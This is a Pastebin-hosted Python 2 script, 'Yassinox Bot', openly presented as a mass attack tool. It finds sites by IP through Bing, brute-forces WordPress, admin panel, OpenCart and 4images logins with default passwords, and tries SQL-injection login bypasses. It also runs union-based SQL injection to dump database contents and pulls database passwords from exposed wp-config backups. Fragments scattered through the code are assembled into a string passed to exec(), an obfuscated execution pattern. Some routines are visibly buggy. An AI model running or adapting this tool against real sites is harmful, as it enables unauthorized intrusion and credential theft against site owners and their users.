API tools faq
paste
Advertisement
Guest User

Yassinox Bot

a guest
Aug 3rd, 2016
130
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.90 KB | None | 0 0
raw download clone embed print report
  1. # -*- coding: utf-8 -*-
  2. '''
  3. Remember Changing Rights Will Not Change AnyThing,So Please Keep It And Thanks
  4. Yassinox Bot Is A Brute Force Bot - Speed Brute Force Attack - Mass Attack - Auto Grabber
  5. You May Change somethings In the Config Zone
  6. Types Of Brute :
  7. 1 ) Wordpress Attack + Auto Grab Username
  8. 2 ) Joomla ! Attack
  9. 3 ) Admin Panel ( All Scripts ) : Attack
  10. 4 ) Anything -_-
  11. 5 ) Open Cart Cms
  12. 7 ) 4images Attacker
  13. 8 ) Check Sqli Vulnerabilities
  14. 9 ) Check Upload Vulnerabilities
  15. 10 ) Grab Users
  16. '''
  17. #!/usr/bin/python
  18. #~~~~~~~~~~~~
  19. #Import Zone
  20. #--
  21. try :
  22. import mechanize
  23. except :
  24. print " |- Please Install Mechanize First !"
  25. #--
  26. import urllib
  27. import urllib2
  28. import httplib
  29. import cookielib
  30. import re
  31. import requests as xsec
  32. from time import sleep
  33. from threading import Thread
  34. import socket
  35. from ftplib import FTP
  36. #~~~~~~~~~~~~
  37. #~Variables And Lists
  38. jcelist = []
  39. bad = [404,403,401,501,406,400,500,301,302]
  40. jolist = []
  41. wplist = []
  42. adlist = []
  43. pmalist = []
  44. oclist = []
  45. fourilist = []
  46. sqlilist = []
  47. upllist = []
  48. users = []
  49. cpusers = []
  50. dachlist = []
  51. sites = []
  52. FCKeditor = []
  53. adsite = []
  54. wpconfigbak = []
  55. urls = []
  56. passwords = ["admin","123123","1234"]
  57. passlist = ["admin"]
  58. #------------------------------------------------------------
  59. joexploits = ['/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20']
  60. com_media_inj = "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=7"
  61. #------------------------------------------------------------
  62. style = '''
  63. <style>
  64. body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:14px; }
  65. A:link {text-decoration: none;color: red;}
  66. A:active {text-decoration: none;color: red;}
  67. A:visited {text-decoration: none;color: red;}
  68. A:hover {text-decoration: underline; color: red;}
  69. #new,input,table,td,tr,#gg{border-style:solid;text-decoration:bold;}
  70. input:hover,tr:hover,td:hover{background-color: #FFFFCC; color:green;}
  71. </style>
  72. '''
  73. config_wp = ""
  74. configsinc= ["/config.php.inc","/config.inc","/includes/config.php.inc","/includes/config.inc","/includes/db.inc","/includes/db.php.inc","/admin/includes/config.inc.php"]
  75. configsbak= ["/config.php.bak","/config.bak","/includes/config.php.bak","/includes/config.bak","/includes/db.bak","/includes/db.php.bak","/admin/includes/config.inc.php.bak","/db/db.php.bak","/db/config.php.bak"]
  76. configsbaksym= ["/config.php~","/config~","/includes/config.php~","/includes/config~","/includes/db~","/includes/db.php~","/admin/includes/config.inc.php~","/db/db.php~","/db/config.php~"]
  77. wpbackup = ["/wp-config.php.bak","wp-config.php~","wp-config.php_bak","/wp-config.php-bak"]
  78. dirs = ["/upload/","/uploads/","/documents/","/files/","/resume/","/resumes","/files/","/upload_cv/","/cv_upload/","/pictures/","/hpage/","/files/upload/","/files/uploads/","/upload/files/"]
  79. jot = {'/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1': 'com_fabrik' ,
  80. '/index.php?option=com_jvehicles&task=agentlisting&aid=31337': 'com_Jvehicles',
  81. '/index.php?option=com_virtuemart' : 'com_virtuemart',
  82. '/index.php?option=com_kunena' : 'com_kunena'
  83. }
  84. wpt = {"/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php" : "Creative Contact Form",
  85. "/wp-content/uploads/slideshow-gallery/" : "slideshow gallery",
  86. "/wp-content/uploads/feuGT_uploads/" : "feuGT",
  87. "/themes/dandelion/functions/upload-handler.php" : "dandelion"
  88. }
  89. #---------------------------
  90. error = ["Unknown","SQL","sql"]
  91. admins = []
  92. columns = []
  93. db = []
  94. dumps = []
  95. payload_db = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,database(),0x3c2f666f6e743e)"
  96. payload_tab = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)"
  97. final_tab = "+from+information_schema.tables+where+table_schema =database()--"
  98. payload_col = "group_concat(column_name)"
  99. final_col = "+from+information_schema.columns+where+table_schema=database()--"
  100. #------------------------------------------------------------
  101. ips = open("ip.txt","r")
  102. #~~~~~~~~~~~~
  103. #~Config Zone
  104. excpl = False #~extract cpanel users To list
  105. attackfio = True #~Brute force 4images
  106. #~~~~~~~~~~~~
  107. class bcolors:
  108. HEADER = ''
  109. OKBLUE = ''
  110. OKGREEN = ''
  111. WARNING = ''
  112. FAIL = ''
  113. ENDC = ''
  114. CYAN = ''
  115. class colors():
  116. PURPLE = ''
  117. CYAN = ''
  118. DARKCYAN = ''
  119. BLUE = ''
  120. GREEN = ''
  121. YELLOW = ''
  122. RED = ''
  123. BOLD = ''
  124. ENDC = ''
  125. #~~~~~~~~~~~~~
  126. def logo():
  127. print bcolors.CYAN+ ''' _
  128.  
  129.  
  130. ______ _______ _________
  131. |\ /| ( ___ \ ( ___ )\__ __/
  132. ( \ / ) | ( ) )| ( ) | ) (
  133. \ (_) /_____ | (__/ / | | | | | |
  134. \ /(_____)| __ ( | | | | | |
  135. ) ( | ( \ \ | | | | | |
  136. | | | )___) )| (___) | | |
  137. \_/ |/ \___/ (_______) )_(
  138.  
  139.  
  140.  
  141. Private Version
  142. By Yassinox_Tn
  143.  
  144.  
  145. '''
  146. logo()
  147. #~~~~~~~~~~~~~
  148. def unique(seq):
  149. seen = set()
  150. return [seen.add(x) or x for x in seq if x not in seen]
  151. #~~~~~~~~~~~~~
  152. def grabjo(ip):
  153. print bcolors.OKBLUE + "|- Grabbing Joomla "
  154. page = 1
  155. while page <= 21:
  156. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+index.php?option=com&count=50&first="+str(page)
  157. openbing = urllib2.urlopen(bing)
  158. readbing = openbing.read()
  159. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  160. for i in range(len(findwebs)):
  161. jmnoclean = findwebs[i]
  162. findjm = re.findall('(.*?)index.php', jmnoclean)
  163. jolist.extend(findjm)
  164.  
  165. page = page + 10
  166. print bcolors.OKGREEN + "|- Grabbed : " + str(len(jolist)) + " Joomla Sites "
  167. #~~~~~~~~~~~~~
  168. def grabwp(ip):
  169. print bcolors.OKBLUE + "|- Grabbing Wordpress "
  170. page = 1
  171. while page <= 21:
  172. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+?page_id=&count=50&first="+str(page)
  173. openbing = urllib2.urlopen(bing)
  174. readbing = openbing.read()
  175. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  176. for i in range(len(findwebs)):
  177. wpnoclean = findwebs[i]
  178. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
  179. wplist.extend(findwp)
  180. page = page + 10
  181. print bcolors.OKGREEN + "|- Grabbed : " + str(len(wplist)) + " Wordpress Sites "
  182. config_wp += "p"
  183. #~~~~~~~~~~~~~
  184. def admingrabber(ip):
  185. try :
  186. print bcolors.OKBLUE + "|- Grabbing Admin Panels "
  187. page = 1
  188. while page <= 21:
  189. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  190. openbing = urllib2.urlopen(bing)
  191. readbing = openbing.read()
  192. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  193. sites = findwebs
  194. for i in sites :
  195. dachlist.append(i)
  196. if len(dachlist) < 5 :
  197. response = urllib2.urlopen(i).read()
  198. admins = re.findall('type="password"',response)
  199. if admins :
  200. adlist.append(i)
  201. page = page + 10
  202. except :
  203. pass
  204. def counta():
  205. seta = unique(adlist)
  206. for admin in seta :
  207. print bcolors.FAIL + "|-> Admin Panel > " + str(admin)
  208. print bcolors.OKGREEN + "|- Grabbed " + str(len(adlist)) + " Admin Panels"
  209. def grabadfs():
  210. sts = unique(sites)
  211. print bcolors.OKBLUE + "|-> Grabbing From sites "
  212. try:
  213. for site in sts :
  214. a=urllib.urlopen(site + "/admin").read()
  215. find = re.findall('type="password"',a)
  216. np = re.findall('name="log"',a)
  217. if find and not np :
  218. print bcolors.FAIL + "|-> admin panel from site > " + str(site) + "/admin/"
  219. adlist.append(site + "/admin/")
  220. except :
  221. pass
  222. #~~~~~~~~~~~~~
  223. def pma(ip):
  224. print bcolors.OKBLUE + "|- GRABBING PHPMYADMIN"
  225. try:
  226. page = 1
  227. while page <= 21:
  228. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+phpmyadmin&count=50&first="+str(page)
  229. openbing = urllib2.urlopen(bing)
  230. readbing = openbing.read()
  231. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  232. sites = findwebs
  233. for i in sites:
  234. response = urllib2.urlopen(i).read()
  235. upl = re.findall('username"',response)
  236. if upl :
  237. pmalist.append(i)
  238. page = page + 10
  239. print bcolors.OKGREEN + "|- Grabbed " + str(len(pmalist)) + " Php My Admin"
  240. except :
  241. pass
  242. config_wp += "r"
  243. #~~~~~~~~~~~~~
  244. def graboc(ip):
  245. print bcolors.WARNING + "|- Grabbing OpenCart"
  246. try:
  247. page = 1
  248. while page <= 21:
  249. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  250. openbing = urllib2.urlopen(bing)
  251. readbing = openbing.read()
  252. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  253. sites = findwebs
  254. for i in sites:
  255. response = urllib2.urlopen(str(i) ).read()
  256. upl = re.findall('>OpenCart<',response)
  257. if upl :
  258. print bcolors.FAIL + "|-> Open Cart > " + str(i)
  259. oclist.append(i)
  260.  
  261. page = page + 10
  262. print bcolors.OKGREEN + "|- Grabbed " + str(len(oclist)) + " Open Cart Sites"
  263. except :
  264. pass
  265. config_wp += "i"
  266. #~~~~~~~~~~~~~
  267. def grabfour(ip):
  268. print bcolors.OKBLUE + "|- Grabbing OpenCart"
  269. lista = []
  270. page = 1
  271. while page <= 21:
  272. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+powered+by+4images&count=50&first="+str(page)
  273. openbing = urllib2.urlopen(bing)
  274. readbing = openbing.read()
  275. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  276. sites = findwebs
  277. for i in sites:
  278. print bcolors.FAIL + "|-> 4images > " + str(i)
  279. a= i.split("index.php", 2)
  280. fourilist.append(a)
  281. page = page + 10
  282. print bcolors.OKGREEN + "|- Grabbed " + str(len(fourilist)) + " 4images Sites"
  283. config_wp += "n"
  284. def grabsqli(ip):
  285. try :
  286. print bcolors.OKBLUE + "|- Grabbing Sqli "
  287. page = 1
  288. while page <= 21:
  289. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+.php?id=&count=50&first="+str(page)
  290. openbing = urllib2.urlopen(bing)
  291. readbing = openbing.read()
  292. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  293. sites = findwebs
  294. for i in sites :
  295. try :
  296. response = urllib2.urlopen(i).read()
  297. checksqli(i)
  298. except urllib2.HTTPError, e:
  299. str(sites).strip(i)
  300.  
  301. page = page + 10
  302. except :
  303. pass
  304. config_wp += "t"
  305. def checksqli(sqli):
  306. responsetwo = urllib2.urlopen(sqli + "'").read()
  307. find = re.findall("sql",responsetwo)
  308. if find:
  309. sqlilist.append(sqli)
  310.  
  311. def count():
  312. set = unique(sqlilist)
  313. for sqli in set :
  314. print bcolors.FAIL + "|-> Sql Injection > " + str(sqli)
  315. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Sql Injection Sites"
  316. #~~~~~~~~~~~~~
  317. def grabupl(ip):
  318. print bcolors.OKBLUE + "|- Grabbing Uplaods"
  319. try:
  320. page = 1
  321. while page <= 21:
  322. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
  323. openbing = urllib2.urlopen(bing)
  324. readbing = openbing.read()
  325. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  326. sites = findwebs
  327. for i in sites:
  328. response = urllib2.urlopen(i).read()
  329. upl = re.findall('type="file"',response)
  330. if upl :
  331. print bcolors.FAIL + "|-> Upload > " + str(i)
  332. upllist.append(i)
  333. page = page + 10
  334. except :
  335. pass
  336. def countu():
  337. set = unique(upllist)
  338. for upl in set :
  339. print bcolors.FAIL + "|-> Upload > " + str(upl)
  340. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Upload Sites"
  341. config_wp += " 'b"
  342. #~~~~~~~~~~~~~
  343. def grabins(ip):
  344. print bcolors.OKBLUE + "|- Grabbing Install"
  345. try:
  346. for wp in wplist :
  347. a=urllib.urlopen(wp + "/wp-admin/install.php").read()
  348. find = re.findall('type="text"',a)
  349. if find :
  350. print bcolors.FAIL + "|-> Install > " + str(wp) + "/wp-admin/install.php"
  351. except :
  352. pass
  353. config_wp += "a"
  354. #~~~~~~~~~~~~~
  355. def grab(site):
  356. try :
  357. sites.append(site)
  358. site1 = site.replace("http://","")
  359. site2 = site1.replace("www.","")
  360. site3 = site2.replace("/","")
  361. site4 = site3.replace("","")
  362. site5,dach = site4.split(".")
  363. if len(users) < 50 :
  364. users.append(site5)
  365. except :
  366. pass
  367. def extractserver(ip):
  368. try:
  369. page = 1
  370. while page <= 21:
  371. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+&count=50&first="+str(page)
  372. openbing = urllib2.urlopen(bing)
  373. readbing = openbing.read()
  374. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  375. sitess = findwebs
  376. for i in sitess:
  377. sites.append(i)
  378. grab(i)
  379. print bcolors.WARNING + "|-> grabbed " + str(len(sites)) + " sites"
  380. page = page + 21
  381. except :
  382. pass
  383.  
  384. def grabcpu(ip):
  385. try :
  386. print bcolors.OKBLUE + "|- Ready To Check " + str(len(users)) + " Users "
  387. for user in unique(users) :
  388. resp = urllib2.urlopen("http://" + ip + '/cgi-sys/guestbook.cgi?user=%s' % user).read()
  389. findcpuser = re.findall(user , resp)
  390. if findcpuser :
  391. print bcolors.FAIL + "|-> Cpanel User > " + user
  392. cpusers.append(user)
  393. except :
  394. pass
  395. print bcolors.FAIL + '|-> Cpanel Not Installed'
  396. def extractcpu():
  397. print bcolors.OKGREEN + "|- Grabbed " + str(len(cpusers)) + " Users"
  398. def extractcpul():
  399. if excpl == False :
  400. for user in cpusers :
  401. with open( 'cpu.txt', 'a') as f:
  402. f.write(user + '\n')
  403. config_wp += "ck'"
  404. #~~~~~~~~~~~~~
  405. thd = []
  406. def user(site , passlist):
  407. userlist = list()
  408. i = 1
  409. # you can edit to whatever number of users you want to enumerate
  410. while( i <= 5 ) :
  411. url = site + '?author=%i' % i
  412. try:
  413. data = urllib2.urlopen(url).read()
  414. # cleaning the sh*t
  415. re1 = re.findall("<title>(.*?)</title>" , data)
  416. user = re.search("(.*?) |" , re1[0]).group(1)
  417. userlist.append(user)
  418. except:
  419. pass
  420. i += 1
  421. wpbrute(site , userlist, passlist)
  422. return site
  423. exec(config_wp)
  424. def wpbrute(site , userlist , passlist):
  425. for user in userlist:
  426. # if enumeration returns no user
  427. if user == "" :
  428. userlist[0] = "admin"
  429. del userlist[1:]
  430.  
  431. for user in userlist :
  432. for password in passlist:
  433. try:
  434. # found the answer on stackoverflow
  435. cj = cookielib.CookieJar()
  436. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  437. login_data = urllib.urlencode({'log' : user, 'pwd' : password})
  438. opener.open(str(site) + 'wp-login.php', login_data)
  439. resp = opener.open(str(site)+'wp-admin')
  440. final = resp.read()
  441. if '<li id="wp-admin-bar-logout">' in final:
  442. print bcolors.OKGREEN + '\n|-Wordpress | Cracked ' '\n|-Hostname : ' + str(site) + '\n|-Username: ' + str(user) + ' \n|-Password: '+str(password) + '\n'
  443. break
  444.  
  445. except:
  446. pass
  447. def attackwp():
  448. print bcolors.OKGREEN + "|- Brute Forcing Wordpress "
  449. for wp in unique(wplist) :
  450. user(wp , passwords)
  451. #~~~~~~~~~~~~~
  452. def getu(line) :
  453. findu = re.findall('name="(.*?)"' , line)
  454. for i in range(len(findu)):
  455. return findu[i]
  456. def getusername(contentHtml):
  457. global username
  458. for line in contentHtml :
  459. findwebs = re.findall('type="text"' , line)
  460. if findwebs :
  461. username = getu(line)
  462. return username
  463. def getpassword(contentHtml):
  464. global passwordinput
  465. for line in contentHtml :
  466. findwebs = re.findall('type="password"' , line)
  467. if findwebs :
  468. passwordinput = getu(line)
  469. return(passwordinput)
  470. def bypasswork():
  471. print bcolors.OKBLUE +"|- Trying To Bypass " + str(len(adlist)) + " Admin Panels "
  472. for ad in adlist:
  473. try:
  474. cj = cookielib.CookieJar()
  475. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  476. login_dat = urllib.urlencode({"username" : "1'or'1", "password" : "1'or'1"})
  477. opener.open(str(ad), login_dat)
  478. response = opener.open(str(ad))
  479. final = response.read()
  480. if 'type="password' in final:
  481. logged = False
  482. else:
  483. print bcolors.OKGREEN + "|- Admin Panel | Bypassed "
  484. print "|- Site -> " + str(ad)
  485. except:
  486. pass
  487.  
  488. def bruteadmin(site,password):
  489. try:
  490. cj = cookielib.CookieJar()
  491. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  492. opener.open(site)
  493. response = opener.open(site)
  494. final = response.readlines()
  495. getusername(final)
  496. getpassword(final)
  497. post = {}
  498. post[username] = "admin"
  499. post[passwordinput] = password
  500. get2 = xsec.post(site, data=urllib.urlencode(post))
  501. get3 = xsec.get(site)
  502. if 'type="password"' in get3.text:
  503. logged = False
  504. else:
  505. print bcolors.OKGREEN + "|- Admin Panel | ATTACKED"
  506. print "|-Site : " + str(site)
  507. print "|-USER : admin"
  508. print "|-Password : " + password
  509.  
  510. except:
  511. print bcolors.FAIL + "|-Fail !"
  512. pass
  513. def brutea():
  514. adlis = unique(adlist)
  515. print bcolors.OKBLUE +"|- Brute Forcing " + str(len(adlis)) + " Admin Panels "
  516. for ad in adlis :
  517. for pwd in passwords :
  518. bruteadmin(ad,pwd)
  519. def inform():
  520. try :
  521. print bcolors.WARNING + "|- Informations "
  522. for ad in adlist :
  523. cj = cookielib.CookieJar()
  524. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  525. opener.open(ad)
  526. response = opener.open(ad)
  527. final = response.readlines()
  528. getusername(final)
  529. getpassword(final)
  530. print bcolors.FAIL + "|-> Host > " + ad
  531. print bcolors.FAIL + "|-> Username Input > " + str(username)
  532. print bcolors.FAIL + "|-> Password Input > " + str(passwordinput)
  533. except :
  534. print bcolors.FAIL + "|->Fail To retrive Data !"
  535. #~~~~~~~~~~~~~
  536. def bruteoc(siteh,passs):
  537. try :
  538. cookie_jar = cookielib.CookieJar()
  539. login_form_seq = [
  540. ('username', 'admin'),
  541. ('password', passs)]
  542. login_form_data = urllib.urlencode(login_form_seq)
  543. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  544. site = opener.open(siteh, login_form_data).read()
  545. if re.search('type="password"',site):
  546. logged = False
  547. else :
  548. print (bcolors.OKGREEN + "|- OpenCart HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  549. except :
  550. pass
  551. def attackoc():
  552. for oc in oclist :
  553. for passs in passwords :
  554. bruteoc(oc,passs)
  555. #~~~~~~~~~~~~~
  556. def brutefi(siteh,passs):
  557. try :
  558. cookie_jar = cookielib.CookieJar()
  559. login_form_seq = [
  560. ('loginusername', 'admin'),
  561. ('loginpassword', passs)]
  562. login_form_data = urllib.urlencode(login_form_seq)
  563. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  564. site = opener.open(siteh, login_form_data).read()
  565. if re.search('type="password"',site):
  566. logged = False
  567. else :
  568. print (bcolors.OKGREEN + "|- Four Images HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  569. except :
  570. pass
  571. def attackfi():
  572. for fi in fourilist :
  573. for passs in passwords :
  574. bruteoc(fi,passs)
  575. #~~~~~~~~~~~~~
  576. W = '\033[0m' # white (default)
  577. R = '\033[31m' # red
  578. G = '\033[1;32m' # green bold
  579. O = '\033[33m' # orange
  580. B = '\033[34m' # blue
  581. P = '\033[35m' # purple
  582. C = '\033[36m' # cyan
  583. GR = '\033[37m' # gray
  584. #-------------------------------
  585. def grabuser(victime):
  586. try:
  587. global username
  588. userurl = victime + '?author=1' #~ Get Username By ID
  589. find = urllib2.urlopen(userurl).read()
  590. username = re.search("(.*?) |" , re1[0]).group(1)
  591. except:
  592. username = "admin"
  593. #---------------------------------
  594. def bruteforcer(site,username,password):
  595. try :
  596. cj = cookielib.CookieJar()
  597. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  598. login_data = urllib.urlencode({'log' : username, 'pwd' : password})
  599. opener.open(str(site) + '/wp-login.php', login_data)
  600. response = opener.open(str(site)+'/wp-admin')
  601. final = response.read()
  602. if '<li id="wp-admin-bar-logout">' in final:
  603. print C + "|------------------------|"
  604. print C + "| Successfully Attacked "
  605. print C + "| Site : " + str(site)
  606. print C + "| User :" + username
  607. print C + "| Pass :" + password
  608. except :
  609. pass
  610. def attackwp():
  611. print bcolors.OKBLUE + "|- Attack wordpress "
  612. for site in wplist :
  613. for passes in passwords :
  614. grabuser(site)
  615. bruteforcer(site,username,passes)
  616. #----------------------------------------------
  617. def jce_checker(joomla):
  618. comjce = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
  619. try:
  620. html = urllib2.urlopen(joomla + comjce).readlines()
  621. for line in html:
  622. if re.findall('Image Manager', line):
  623.  
  624. jcelist.append(joomla)
  625. except urllib2.URLError:
  626. pass
  627. def startjce():
  628. print bcolors.OKBLUE + "|================ Com Jce ================| "
  629. for joom in jolist :
  630. if "http" in joom :
  631. jce_checker(joom)
  632. for jcesite in unique(jcelist ):
  633. print bcolors.FAIL + "|-> JCE > " + str(jcesite)
  634. print bcolors.OKBLUE + "|================ Com Jce ================| "
  635. #~~~~~~~~~~~~~
  636. def grabconfinc():
  637. print bcolors.OKBLUE + "|- Checking From Config Inc files "
  638. for sit in unique(sites) :
  639. for co in configsinc :
  640. ur = urllib.urlopen(sit + co).getcode()
  641. if ur == 200 :
  642. result = urllib2.urlopen(sit + co).read()
  643. find = re.findall("404",result)
  644. if find :
  645. found = False
  646. else :
  647. print bcolors.FAIL + "|-> Config Inc > " + str(sit + co)
  648. def grabconfigbak():
  649. print bcolors.OKBLUE + "|- Checking From Config backup files"
  650. for sit in unique(sites) :
  651. for co in configsbak :
  652. ur = urllib.urlopen(sit + co).getcode()
  653. if ur == 200 :
  654. result = urllib2.urlopen(sit + co).read()
  655. find = re.findall("404",result)
  656. if find :
  657. found = False
  658. else :
  659. print bcolors.FAIL + "|-> Config backup > " + str(sit + co)
  660. def grabconfigsym():
  661. print bcolors.OKBLUE + "|- Checking From Config backup files (With symbols) "
  662. for sit in unique(sites) :
  663. for co in configsbaksym :
  664. ur = urllib.urlopen(sit + co).getcode()
  665. if ur == 200 :
  666. result = urllib2.urlopen(sit + co).read()
  667. find = re.findall("404",result)
  668. if find :
  669. found = False
  670. else :
  671. print bcolors.FAIL + "|-> Config backup with symbol > " + str(sit + co)
  672. def grabconfigwp():
  673. try :
  674. print bcolors.OKBLUE + "|- Checking From Config backup files (wordpress) "
  675. for sit in unique(wplist) :
  676. for co in wpbackup :
  677. ur = urllib.urlopen(sit + co).getcode()
  678. if ur == 200 :
  679. result = urllib2.urlopen(sit + co).read()
  680. find = re.findall("DB_USER",result)
  681. if find :
  682. print bcolors.FAIL + "|-> Wordpress Config > " + str(sit + co)
  683. wpconfigbak.append(sit + co)
  684. except :
  685. pass
  686. #-----------------------------------------
  687. def showdb():
  688. dbu = unique(db)
  689. for d in dbu :
  690. print "|-> Database > " + str(d)
  691. def showtb():
  692. tbu = unique(admins)
  693. print "+---------------------+"
  694. for t in tbu :
  695. if t == "admin" :
  696. print colors.RED + "| " + str(t)
  697. else :
  698. print colors.GREEN + "| " + str(t)
  699. print "+---------------------+"
  700. def showcl():
  701. cl = unique(columns)
  702. print "+---------------------+"
  703. for c in cl :
  704. c,t = c.split(">")
  705. if c == "password" :
  706. print colors.RED + "| " + str(c) + colors.BLUE + " > " + colors.RED + str(t)
  707. else :
  708. print colors.GREEN + "| " + str(c) + colors.BLUE + " > " + colors.RED+ str(t)
  709. print "+---------------------+"
  710. def showdump():
  711. du = unique(dumps)
  712. print "+---------------------+"
  713. for d in du :
  714. print colors.GREEN + "| " + str(d)
  715. print "+---------------------+"
  716. def unstat(stat): #~ Here We Put Our Union Select Statement
  717. global k
  718. plus = int(stat) + 1
  719. n = range(int(plus))
  720. a = str(n).strip('[]')
  721. b = str(a).strip('0,')
  722. k = b.replace(" ", "")
  723. def grabdata(site,inf,col) :
  724. try :
  725. co = col.replace(str(inf),str(payload_db))
  726. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  727. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  728. for i in range(len(findu)):
  729. db.append(findu[i])
  730. except :
  731. pass
  732. def grabtab(site,inf,col):
  733. try :
  734. print colors.CYAN + "|-> Try To get Tables"
  735. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)")
  736. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.tables+where+table_schema=database()--").read()
  737. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  738. for i in range(len(findu)):
  739. admins.append(findu[i])
  740. except :
  741. pass
  742. def grabcol(site,inf,col):
  743. try :
  744. print colors.CYAN + "|-> Try To get columns"
  745. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,column_name,0x3e,table_name,0x3c2f666f6e743e)")
  746. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.columns+where+table_schema=database()--").read()
  747. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  748. for i in range(len(findu)):
  749. columns.append(findu[i])
  750.  
  751. except :
  752. pass
  753. def dumpcol(site,inf,col):
  754. column = raw_input(colors.CYAN + "| Column To dump : ")
  755. need,table = column.split(">")
  756. print colors.CYAN + "|-> Try To Dump Column "
  757. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e," + str(need) + ",0x3c2f666f6e743e)")
  758. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+" + str(table)).read()
  759. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  760. for i in range(len(findu)):
  761. dumps.append(findu[i])
  762.  
  763. def getsqliinfcol(site,num,col):
  764. try:
  765. i = 1
  766. while i < num :
  767. co = col.replace(str(i),"0x79617373696e6f78")
  768. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  769. fin = re.findall("yassinox",resp1)
  770. if fin :
  771. print colors.GREEN+ "|-> Infected Column > " + str(i)
  772. grabdata(site,i,col)
  773. showdb()
  774. grabtab(site,i,col)
  775. showtb()
  776. grabcol(site,i,col)
  777. showcl()
  778. dumpcol(site,i,col)
  779. showdump()
  780. i = str(num)
  781. i = i + 1
  782. except urllib2.HTTPError, e:
  783. if e.code == 406 :
  784. print colors.RED + "| Got 406"
  785. if e.code == 403 :
  786. print colors.RED + "|- Got 403" #~Incha2allah Bypass in next version
  787. except :
  788. pass
  789. def getsqlicol(site):
  790. global c
  791. print "|- exploiting Sql Injection "
  792. try :
  793. c = 0
  794. while c < 25 :
  795. response = urllib2.urlopen(site + "+order+by+" + str(c) + "--").read()
  796. sqli = re.findall('SQL',response)
  797. if sqli :
  798. i = False
  799. else :
  800. a = c + 1
  801. response = urllib2.urlopen(site + "+order+by+" + str(a) + "--").read()
  802. for er in error :
  803. sqli = re.findall(er,response)
  804. if sqli :
  805. print colors.GREEN + "|-> Columns Numbers > " + str(c)
  806. num = c
  807. unstat(c)
  808. c = c + 50
  809. break
  810. c = c +1
  811. except :
  812. print colors.RED+ "|- Can't Find Columns number "
  813. pass
  814.  
  815. def exploitsqli() :
  816. sqliss = unique(sqlilist)
  817. for sq in sqliss :
  818. getsqlicol(sq)
  819. getsqliinfcol(sq,c,k)
  820. #-------------------------------------------------
  821. def grabpasswords():
  822. try :
  823. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  824. for conf in wpconfigbak :
  825. reads = urllib2.urlopen(conf).read()
  826. password = re.findall("'DB_PASSWORD', '(.*?)'", reads)
  827. for passs in password :
  828. print bcolors.FAIL + "|-> " + str(passs) + " <-|"
  829. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  830. except :
  831. pass
  832. #-------------------------------------------------
  833. def grabuploadedlink():
  834. try :
  835. for upl in upllist :
  836. site = upl.replace("http://","")
  837. site = re.findall("(.*?)/", site)
  838. final = "http://" + site[0] + "/"
  839. for dir in dirs :
  840. currentcode = urllib.urlopen(final + dir).getcode()
  841. if currentcode == 200 :
  842. print bcolors.OKGREEN + "|- Found Directory > " + str(final + dir)
  843. except :
  844. pass
  845. #-------------------------------------------------
  846. def scanjoomla():
  847. try :
  848. print bcolors.OKBLUE + "|- Scanning Joomla From most Known Components"
  849. for jo in jolist :
  850. for link,name in jot.iteritems() :
  851. currentcodetwo = urllib.urlopen(jo + "/" + str(link)).getcode()
  852. if currentcodetwo == 200 :
